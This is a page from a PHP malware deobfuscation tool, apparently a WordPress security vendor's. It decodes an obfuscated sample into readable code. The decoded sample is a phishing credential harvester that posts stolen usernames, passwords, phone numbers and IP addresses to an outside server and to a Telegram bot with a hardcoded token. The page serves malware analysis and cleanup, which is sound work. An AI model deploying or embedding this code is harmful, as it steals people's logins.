Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php eval(base64_decode('CiBnb3RvIFFxUUZ0OyBCWTdqSjogaWYgKGVtcHR5KCRfUE9TVFsiXHg3MFx4NzIiXSkpIHsgJG5hbWVFcnIgPSAiXHgyMCI7IH0gZWxzZWlmIChzdHJsZW4oJF9QT1NUWyJcMTQxXHg2OSJdKSA+IDYwKSB7ICRuYW1lRXJyID0gIlx4MjAiOyB9IGVsc2VpZiAoc3RybGVuKCRfUE9TVFsiXHg3MFwxNjIiXSkgPiA2MCkgeyAkbmFtZUVyciA9ICJceDIwIjsgfSB...



Obfuscated php code

<?php eval(base64_decode('CiBnb3RvIFFxUUZ0OyBCWTdqSjogaWYgKGVtcHR5KCRfUE9TVFsiXHg3MFx4NzIiXSkpIHsgJG5hbWVFcnIgPSAiXHgyMCI7IH0gZWxzZWlmIChzdHJsZW4oJF9QT1NUWyJcMTQxXHg2OSJdKSA+IDYwKSB7ICRuYW1lRXJyID0gIlx4MjAiOyB9IGVsc2VpZiAoc3RybGVuKCRfUE9TVFsiXHg3MFwxNjIiXSkgPiA2MCkgeyAkbmFtZUVyciA9ICJceDIwIjsgfSBlbHNlaWYgKHN0cmxlbigkX1BPU1RbIlx4NjFceDY5Il0pIDwgMSkgeyAkbmFtZUVyciA9ICJceDIwIjsgfSBlbHNlaWYgKHN0cmxlbigkX1BPU1RbIlwxNjBceDcyIl0pIDwgMSkgeyAkbmFtZUVyciA9ICJceDIwIjsgfSBlbHNlIHsgJF9TRVNTSU9OWyJcMTQxXHg2OSJdID0gJGFpID0gJF9QT1NUWyJcMTQxXDE1MSJdOyAkYWkgPSAkX1BPU1RbIlx4NjFcMTUxIl07ICRwciA9ICRfUE9TVFsiXHg3MFwxNjIiXTsgJGlwID0gZ2V0ZW52KCJceDUyXHg0NVwxMTVceDRmXHg1NFx4NDVcMTM3XDEwMVx4NDRcMTA0XHg1MiIpOyAkcG9ydCA9ICRfU0VSVkVSWyJcMTIyXHg0NVx4NGRcMTE3XHg1NFwxMDVceDVmXHg1MFwxMTdcMTIyXHg1NCJdOyAkaG9zdG5hbWUgPSBnZXRob3N0YnlhZGRyKCRpcCk7ICRkYXRhID0gYXJyYXkoIlx4NjFcMTUxIiA9PiAkYWksICJceDcwXHg3MiIgPT4gJHByKTsgJHVybCA9ICJcMTUwXHg3NFx4NzRceDcwXDcyXHgyZlx4MmZceDM1XDYzXDE0MVx4NjJcNjFcNjJcNjNceDJlXDE0MVwxNDJceDMxXHgzMlw2M1x4MzhcNjJceDMzXDYzXDYyXDU2XDcxXDY2XHgyZVwxNTRceDc0XHgyZlwxNTdceDY2XHg2Nlx4NjlcMTQzXDE0NVx4MmVceDcwXDE1MFwxNjAiOyAkb3B0aW9ucyA9IGFycmF5KENVUkxPUFRfVVJMID0+ICR1cmwsIENVUkxPUFRfUE9TVCA9PiAxLCBDVVJMT1BUX1BPU1RGSUVMRFMgPT4gaHR0cF9idWlsZF9xdWVyeSgkZGF0YSksIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIgPT4gdHJ1ZSk7ICRjdXJsID0gY3VybF9pbml0KCk7IGN1cmxfc2V0b3B0X2FycmF5KCRjdXJsLCAkb3B0aW9ucyk7ICRyZXNwb25zZSA9IGN1cmxfZXhlYygkY3VybCk7IGN1cmxfY2xvc2UoJGN1cmwpOyAkYm90VG9rZW4gPSAiXHgzN1w3MFw3MFw2M1w2N1w3MFx4MzJcNjVceDM0XHgzOVw3MlwxMDFcMTAxXHg0OFwxNTJceDZjXDExMFwxNjBcMTU3XDE1NFx4MzFcMTQxXDY2XDE0Mlx4NmRcMTY3XHg0Nlw2M1x4MmRcMTYxXDEyNVx4NWFceDc4XHgzOVwxNTNcMTU3XDE2MFw3MVwxNDJcNzBceDcwXDEwMVx4NDlcMTA2XDE2MVx4NDkiOyAkY2hhdElkID0gIlx4MzdceDM3XHgzNlw2Nlx4MzRcNjBcNjZcNjBcNjBceDM2IjsgJHVybCA9ICJceDY4XHg3NFwxNjRceDcwXHg3M1x4M2FcNTdceDJmXHg2MVx4NzBceDY5XHgyZVx4NzRceDY1XHg2Y1wxNDVceDY3XHg3Mlx4NjFcMTU1XDU2XDE1N1x4NzJceDY3XDU3XDE0MlwxNTdceDc0eyRib3RUb2tlbn1cNTdcMTYzXDE0NVx4NmVcMTQ0XHg0ZFwxNDVcMTYzXDE2M1wxNDFceDY3XDE0NVx4M2ZceDYzXDE1MFx4NjFceDc0XDEzN1wxNTFcMTQ0XHgzZHskY2hhdElkfVwxMlx4YVw0NlwxNjRceDY1XDE3MFx4NzRcNzVceDc1XDE2M1x4NjVceDcyXDE1NlwxNDFcMTU1XDE0NVx4M2FcNDB7JGFpfVw0NVx4MzBcMTAxXHg1MFwxNjdceDNhXHgyMHskcHJ9XHgyNVx4MzBceDQxXDEwM1wxNTRceDY5XDE0NVwxNTZceDc0XDQwXDE1MVwxNjBceDNhXDQweyRpcH1ceDI1XHgzMFx4NDFcNzVcNzVcNzVceDNkXHgzZFw3NVx4M2RcNzVceDNkXHgzZFw3NVw3NVx4M2RcNTNcNDBcMTMzXDQwXDEwM1wxNjJceDY1XHg2MVx4NzRceDY1XHg2NFw0MFx4NjJceDc5XHgyMFwxMlx4YVwxMTdceDZkXDE0NVwxMDdcMTQxXHg0Y1x4NmZceDcyXDEwNFw0MFx4NWRceDIwXHgyYlx4M2RcNzVceDNkXHgzZFx4M2RcNzVcNzVcNzVcNzVcNzVceDNkXDc1XHgzZCI7ICRzdHJlYW1PcHRpb25zID0gYXJyYXkoIlwxNjNceDczXHg2YyIgPT4gYXJyYXkoIlx4NzZceDY1XHg3MlwxNTFcMTQ2XDE3MVx4NWZceDcwXHg2NVx4NjVceDcyIiA9PiBmYWxzZSwgIlwxNjZceDY1XHg3MlwxNTFceDY2XHg3OVwxMzdcMTYwXHg2NVwxNDVceDcyXDEzN1wxNTZceDYxXDE1NVwxNDUiID0+IGZhbHNlKSwgIlwxNTBceDc0XDE2NFx4NzAiID0+IGFycmF5KCJcMTU1XDE0NVwxNjRcMTUwXDE1N1x4NjQiID0+ICJceDUwXHg0Zlx4NTNcMTI0IikpOyAkY29udGV4dCA9IHN0cmVhbV9jb250ZXh0X2NyZWF0ZSgkc3RyZWFtT3B0aW9ucyk7ICRoYW5kbGUgPSBmb3BlbigkdXJsLCAiXDE2MiIsIGZhbHNlLCAkY29udGV4dCk7ICRyZXNwb25zZSA9IHN0cmVhbV9nZXRfY29udGVudHMoJGhhbmRsZSk7IGZjbG9zZSgkaGFuZGxlKTsgZWNobyAkcmVzcG9uc2U7IH0gZ290byBlRWxvTzsgY1ZZNE06IGlmIChlbXB0eSgkX1BPU1RbIlwxNDFcMTUxIl0pKSB7ICRuYW1lRXJyID0gIlx4MjAiOyB9IGdvdG8gQlk3ako7IFFxUUZ0OiBzZXNzaW9uX3N0YXJ0KCk7IGdvdG8gY1ZZNE07IGVFbG9POiBpZiAoIWVtcHR5KCRfUE9TVFsiXHg2Nlx4NmZcMTU2XDE1NiJdKSkgeyAkZm9ubiA9ICRfUE9TVFsiXDE0Nlx4NmZceDZlXDE1NiJdOyAkaXAgPSBnZXRlbnYoIlwxMjJceDQ1XHg0ZFx4NGZcMTI0XHg0NVwxMzdceDQxXHg0NFx4NDRceDUyIik7ICRwb3J0ID0gJF9TRVJWRVJbIlx4NTJceDQ1XHg0ZFx4NGZcMTI0XDEwNVx4NWZceDUwXHg0ZlwxMjJcMTI0Il07ICRob3N0bmFtZSA9IGdldGhvc3RieWFkZHIoJGlwKTsgJGRhdGEgPSBhcnJheSgiXDE0NlwxNTdceDZlXHg2ZSIgPT4gJGZvbm4pOyAkdXJsID0gIlwxNTBcMTY0XDE2NFx4NzBceDNhXHgyZlx4MmZceDM1XHgzM1x4NjFceDYyXDYxXDYyXHgzM1x4MmVcMTQxXDE0Mlx4MzFceDMyXHgzM1x4MzhceDMyXHgzM1w2M1w2Mlw1Nlw3MVx4MzZceDJlXHg2Y1x4NzRceDJmXHg2ZlwxNDZceDY2XDE1MVwxNDNcMTQ1XHgyZVwxNjBceDY4XHg3MCI7ICRvcHRpb25zID0gYXJyYXkoQ1VSTE9QVF9VUkwgPT4gJHVybCwgQ1VSTE9QVF9QT1NUID0+IDEsIENVUkxPUFRfUE9TVEZJRUxEUyA9PiBodHRwX2J1aWxkX3F1ZXJ5KCRkYXRhKSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiA9PiB0cnVlKTsgJGN1cmwgPSBjdXJsX2luaXQoKTsgY3VybF9zZXRvcHRfYXJyYXkoJGN1cmwsICRvcHRpb25zKTsgJHJlc3BvbnNlID0gY3VybF9leGVjKCRjdXJsKTsgY3VybF9jbG9zZSgkY3VybCk7ICRib3RUb2tlbiA9ICJceDM3XDcwXDcwXHgzM1x4MzdceDM4XHgzMlw2NVw2NFx4MzlcNzJceDQxXDEwMVwxMTBceDZhXDE1NFx4NDhceDcwXHg2ZlwxNTRcNjFceDYxXDY2XDE0MlwxNTVcMTY3XHg0Nlw2M1w1NVwxNjFceDU1XDEzMlwxNzBceDM5XHg2YlwxNTdceDcwXDcxXHg2Mlw3MFwxNjBceDQxXHg0OVx4NDZceDcxXDExMSI7ICRjaGF0SWQgPSAiXHgzN1x4MzdcNjZceDM2XHgzNFx4MzBceDM2XDYwXDYwXDY2IjsgJHVybCA9ICJcMTUwXHg3NFx4NzRcMTYwXHg3M1w3Mlx4MmZcNTdcMTQxXDE2MFwxNTFcNTZceDc0XDE0NVx4NmNceDY1XDE0N1x4NzJceDYxXDE1NVw1Nlx4NmZcMTYyXHg2N1w1N1wxNDJcMTU3XHg3NHskYm90VG9rZW59XHgyZlwxNjNcMTQ1XHg2ZVwxNDRcMTE1XHg2NVwxNjNceDczXDE0MVx4NjdcMTQ1XHgzZlwxNDNceDY4XDE0MVx4NzRceDVmXHg2OVwxNDRceDNkeyRjaGF0SWR9XHhhXDEyXHgyNlx4NzRcMTQ1XHg3OFwxNjRceDNkXHg1MFx4NjhcMTU3XHg2ZVwxNDVceDNhXDQweyRmb25ufVx4MjVceDMwXDEwMVx4NDNcMTU0XHg2OVx4NjVcMTU2XDE2NFx4MjBcMTUxXDE2MFx4M2FcNDB7JGlwfVx4MjVcNjBcMTAxXDc1XDc1XHgzZFw3NVx4M2RceDNkXDc1XDc1XDc1XDc1XHgzZFw3NVx4M2RcNTNceDIwXDEzM1x4MjBceDQzXHg3Mlx4NjVcMTQxXDE2NFx4NjVceDY0XDQwXDE0MlwxNzFcNDBcMTE3XDE1NVx4NjVceDQ3XHg2MVx4NGNceDZmXDE2Mlx4NDRcNDBcMTM1XDQwXDEyXHhhXHgyYlw3NVx4M2RcNzVceDNkXDc1XDc1XHgzZFx4M2RceDNkXHgzZFx4M2RcNzVceDNkIjsgJHN0cmVhbU9wdGlvbnMgPSBhcnJheSgiXDE2M1wxNjNceDZjIiA9PiBhcnJheSgiXDE2NlwxNDVcMTYyXHg2OVx4NjZceDc5XDEzN1x4NzBcMTQ1XHg2NVx4NzIiID0+IGZhbHNlLCAiXDE2NlwxNDVcMTYyXHg2OVwxNDZceDc5XHg1ZlwxNjBceDY1XDE0NVx4NzJcMTM3XHg2ZVx4NjFceDZkXDE0NSIgPT4gZmFsc2UpLCAiXDE1MFx4NzRcMTY0XHg3MCIgPT4gYXJyYXkoIlx4NmRcMTQ1XDE2NFx4NjhcMTU3XHg2NCIgPT4gIlwxMjBcMTE3XDEyM1wxMjQiKSk7ICRjb250ZXh0ID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKCRzdHJlYW1PcHRpb25zKTsgJGhhbmRsZSA9IGZvcGVuKCR1cmwsICJceDcyIiwgZmFsc2UsICRjb250ZXh0KTsgJHJlc3BvbnNlID0gc3RyZWFtX2dldF9jb250ZW50cygkaGFuZGxlKTsgZmNsb3NlKCRoYW5kbGUpOyBlY2hvICRyZXNwb25zZTsgfSBnb3RvIFVoNkROOyBVaDZETjog')); ?>

Decoded(de-Obfuscated) php code

<?php

eval {
    session_start();
    if (empty($_POST["ai"])) {
        $nameErr = " ";
    }
    if (empty($_POST["pr"])) {
        $nameErr = " ";
    } elseif (strlen($_POST["ai"]) > 60) {
        $nameErr = " ";
    } elseif (strlen($_POST["pr"]) > 60) {
        $nameErr = " ";
    } elseif (strlen($_POST["ai"]) < 1) {
        $nameErr = " ";
    } elseif (strlen($_POST["pr"]) < 1) {
        $nameErr = " ";
    } else {
        $_SESSION["ai"] = $ai = $_POST["ai"];
        $ai = $_POST["ai"];
        $pr = $_POST["pr"];
        $ip = getenv("REMOTE_ADDR");
        $port = $_SERVER["REMOTE_PORT"];
        $hostname = gethostbyaddr($ip);
        $data = array("ai" => $ai, "pr" => $pr);
        $url = "http://53ab123.ab12382332.96.lt/office.php";
        $options = array(CURLOPT_URL => $url, CURLOPT_POST => 1, CURLOPT_POSTFIELDS => http_build_query($data), CURLOPT_RETURNTRANSFER => true);
        $curl = curl_init();
        curl_setopt_array($curl, $options);
        $response = curl_exec($curl);
        curl_close($curl);
        $botToken = "7883782549:AAHjlHpol1a6bmwF3-qUZx9kop9b8pAIFqI";
        $chatId = "7766406006";
        $url = "https://api.telegram.org/bot{$botToken}/sendMessage?chat_id={$chatId}\n\n&text=username: {$ai}%0APw: {$pr}%0AClient ip: {$ip}%0A=============+ [ Created by \n\nOmeGaLorD ] +=============";
        $streamOptions = array("ssl" => array("verify_peer" => false, "verify_peer_name" => false), "http" => array("method" => "POST"));
        $context = stream_context_create($streamOptions);
        $handle = fopen($url, "r", false, $context);
        $response = stream_get_contents($handle);
        fclose($handle);
        echo $response;
    }
    if (!empty($_POST["fonn"])) {
        $fonn = $_POST["fonn"];
        $ip = getenv("REMOTE_ADDR");
        $port = $_SERVER["REMOTE_PORT"];
        $hostname = gethostbyaddr($ip);
        $data = array("fonn" => $fonn);
        $url = "http://53ab123.ab12382332.96.lt/office.php";
        $options = array(CURLOPT_URL => $url, CURLOPT_POST => 1, CURLOPT_POSTFIELDS => http_build_query($data), CURLOPT_RETURNTRANSFER => true);
        $curl = curl_init();
        curl_setopt_array($curl, $options);
        $response = curl_exec($curl);
        curl_close($curl);
        $botToken = "7883782549:AAHjlHpol1a6bmwF3-qUZx9kop9b8pAIFqI";
        $chatId = "7766406006";
        $url = "https://api.telegram.org/bot{$botToken}/sendMessage?chat_id={$chatId}\n\n&text=Phone: {$fonn}%0AClient ip: {$ip}%0A=============+ [ Created by OmeGaLorD ] \n\n+=============";
        $streamOptions = array("ssl" => array("verify_peer" => false, "verify_peer_name" => false), "http" => array("method" => "POST"));
        $context = stream_context_create($streamOptions);
        $handle = fopen($url, "r", false, $context);
        $response = stream_get_contents($handle);
        fclose($handle);
        echo $response;
    }
};

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.